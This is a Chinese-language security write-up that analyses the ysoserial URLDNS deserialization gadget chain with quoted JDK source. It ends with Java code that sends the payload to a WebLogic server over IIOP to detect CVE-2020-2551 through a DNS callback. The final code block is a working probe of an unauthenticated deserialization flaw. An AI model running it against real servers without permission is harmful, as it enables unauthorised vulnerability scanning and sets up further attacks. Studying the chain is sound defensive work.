ysoserial gadget之DNSURL gadget分析及实战利用

payload

HashMap ht = new HashMap(); 
URL u = new URL(url); Reflections.setFieldValue(u, "hashCode", -1); 

分析

查看gadget调用链

 *   Gadget Chain:
 *     HashMap.readObject()
 *       HashMap.putVal()
 *         HashMap.hash()
 *           URL.hashCode()

首先查看HashMap的ReadObject 方法。重点查找在哪里调用putVal方法。

            // Read the keys and values, and put the mappings in the HashMap
            for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }

在调用putVal方法之前会调用hash方法，查看一下源代码

    static final int hash(Object key) {
        int h;
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
    }

如果key不存在的话，hashcode为0。如果key存在的话，则调用key的hashcode方法。在gadget中，key为URL类。所以我们去查看URL的hashCode方法。如下

    public synchronized int hashCode() {
        if (hashCode != -1)
            return hashCode;

        hashCode = handler.hashCode(this);
        return hashCode;
    }

URL类的hashCode很简单。如果hashcode不为-1，则返回hashcode。这也就是前面在构造payload的时候，需要设置hashcode为-1的原因。
随后调用handler的hashCode方法。该类的定义在URL的构造函数中，主要是根据scheme去决定用什么类做handler。例如http等。在这里，理所当然是URLStreamHandler类。所以查看一下URLStreamHandler的hashcode方法

    protected int hashCode(URL u) {
        int h = 0;

        // Generate the protocol part.
        String protocol = u.getProtocol();
        if (protocol != null)
            h += protocol.hashCode();

        // Generate the host part.
        InetAddress addr = getHostAddress(u);
        if (addr != null) {
            h += addr.hashCode();
        } else {
            String host = u.getHost();
            if (host != null)
                h += host.toLowerCase().hashCode();
        }
}

可以看出，这里调用了getHostAddress，也就是这里会触发dns查询。完成dnslog的gadget工作

实战

这个gadget一般不受jdk版本限制，很适合用来检测目标站点是否存在java反序列化。

cve-2020-2551 weblogic iiop反序列化漏洞

网络上公开的exp，都是基于rmi去执行。但是rmi在高版本jdk被限制了，而且如果是检测的话，很难构造。这时候我们可以使用dnsurl去检测weblogic是否存在iiop反序列化漏洞。代码如下

        dnsUrl = String.format("http://%s", dnsUrl.trim());
        Context context = createIIopContext(ip, port);

        HashMap ht = new HashMap(); // HashMap that will contain the URL
        URL u = new URL(dnsUrl); // URL to use as the Key
        ht.put(u, dnsUrl); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

        final Field field = getField(u.getClass(), "hashCode");
        field.set(u, -1);

        context.rebind("Fucker"+System.nanoTime(), ht);